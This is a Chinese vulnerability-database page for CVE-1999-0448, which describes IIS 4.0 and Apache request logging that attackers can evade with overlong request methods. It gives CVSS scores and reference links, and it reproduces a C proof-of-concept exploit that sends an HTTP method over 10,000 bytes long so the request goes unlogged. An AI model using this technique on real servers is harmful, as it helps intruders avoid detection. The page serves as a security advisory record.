CVE-1999-0448
CVSS5.0
发布时间 :1999-01-01 00:00:00
修订时间 :2008-09-09 08:34:32
NMCOE    

[原文]IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.


[CNNVD]IIS 和 Apache log HTTP隐藏URL漏洞(CNNVD-199901-004)

        IIS 4.0 和 Apache log HTTP请求方法中存在漏洞。不管它们多长,远程攻击者可以利用该漏洞隐藏他们真正需求的URL。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0448
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0448
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199901-004
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

IIS 和 Apache log HTTP隐藏URL漏洞
中危 未知
1999-01-01 00:00:00 2005-05-02 00:00:00
远程  
        IIS 4.0 和 Apache log HTTP请求方法中存在漏洞。不管它们多长,远程攻击者可以利用该漏洞隐藏他们真正需求的URL。

- 公告与补丁

        

- 漏洞信息 (19149)

NT IIS4 Log Avoidance Vulnerability (EDBID:19149)
windows remote
1999-01-22 Verified
0 Mnemonix
N/A [点击下载]
source: http://www.securityfocus.com/bid/191/info

An http get request against an IIS4 server will not be logged if the request is longer than 10150 bytes long. 

/* Compile with eg Visual C++ and link with wsock32.lib

#include <stdio.h>
#include <winsock2.h>
#include <string.h>


int main (int argc, char *argv[])
{
int snd, rcv, err, portno,a=0,b, res;
char resp[1024];
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sa;
struct hostent *he;
SOCKET sock;

if (argc !=2)
{
printf("Usage:\nc:\\>%s target_machine\n\nDavid Litchfield\n21st January
1999\n", argv[0]);
return 0;
}
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );

if ( err != 0 )
{
printf("No winsock.dll\n");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
{
printf("No winsock.dll - 2nd\n");
WSACleanup( );
return 0;
}

if ((he = gethostbyname(argv[1])) == NULL)
{
printf("Invalid Host\n");
return 0;
}




sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
{
printf("Invalid Socket!\n");
return 0;
}
else
{
printf("");
}

sa.sin_addr.s_addr=INADDR_ANY;
sa.sin_family=AF_INET;



bind(sock,(struct sockaddr *)&sa,sizeof(sa));



sa.sin_port=htons(80);

memcpy(&sa.sin_addr,he->h_addr,he->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)
{
printf("Failed to connect!\n");
}
else
{

/* This loop creates the REQUEST_METHOD and makes it 10140 bytes long

while (a < 10141)
{
snd=send(sock,"A", 1, 0);
a ++;
}
snd=send(sock," /default.asp HTTP/1.0\n\n",43,0);
rcv=recv(sock,resp,256,0);
printf("\n%s",resp);
rcv=recv(sock,resp,1024,0);
printf("\n%s\n\n",resp);

}


closesocket(sock);

return 0;
} 		

- 漏洞信息

928
Microsoft IIS Long Request Log Evasion

- 漏洞描述

Unknown or Incomplete

- 时间线

1999-01-21 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站